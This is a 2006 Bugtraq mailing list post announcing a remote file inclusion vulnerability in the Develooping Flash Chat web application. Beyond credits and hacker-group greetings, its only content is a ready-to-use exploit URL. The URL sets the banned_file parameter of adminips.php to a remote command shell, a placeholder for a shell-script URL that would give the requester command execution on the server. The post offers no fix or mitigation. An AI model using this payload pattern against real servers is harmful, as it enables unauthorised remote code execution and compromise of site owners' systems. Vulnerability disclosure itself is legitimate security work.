
Date: 16 Jun 2006 06:29:33 -0000
From: SpC-x@...mail.Org
To: bugtraq@...urityfocus.com
Subject: Develooping Flash Chat (banned_file) Remote File Inclusion


######################################################
# Develooping Flash Chat (banned_file) Remote File Inclusion
######################################################
# Credit : SpC-x
# Site : http://wWw.SaVSaK.CoM
######################################################
# Greetz :
# | Liz0ziM | Ejder | FasTBoY | The_BeKiR | Nukedx |
######################################################

Remote File Include :

http://www.target.com/path/chat/adminips.php?banned_file=CmdShell

/SpC-x


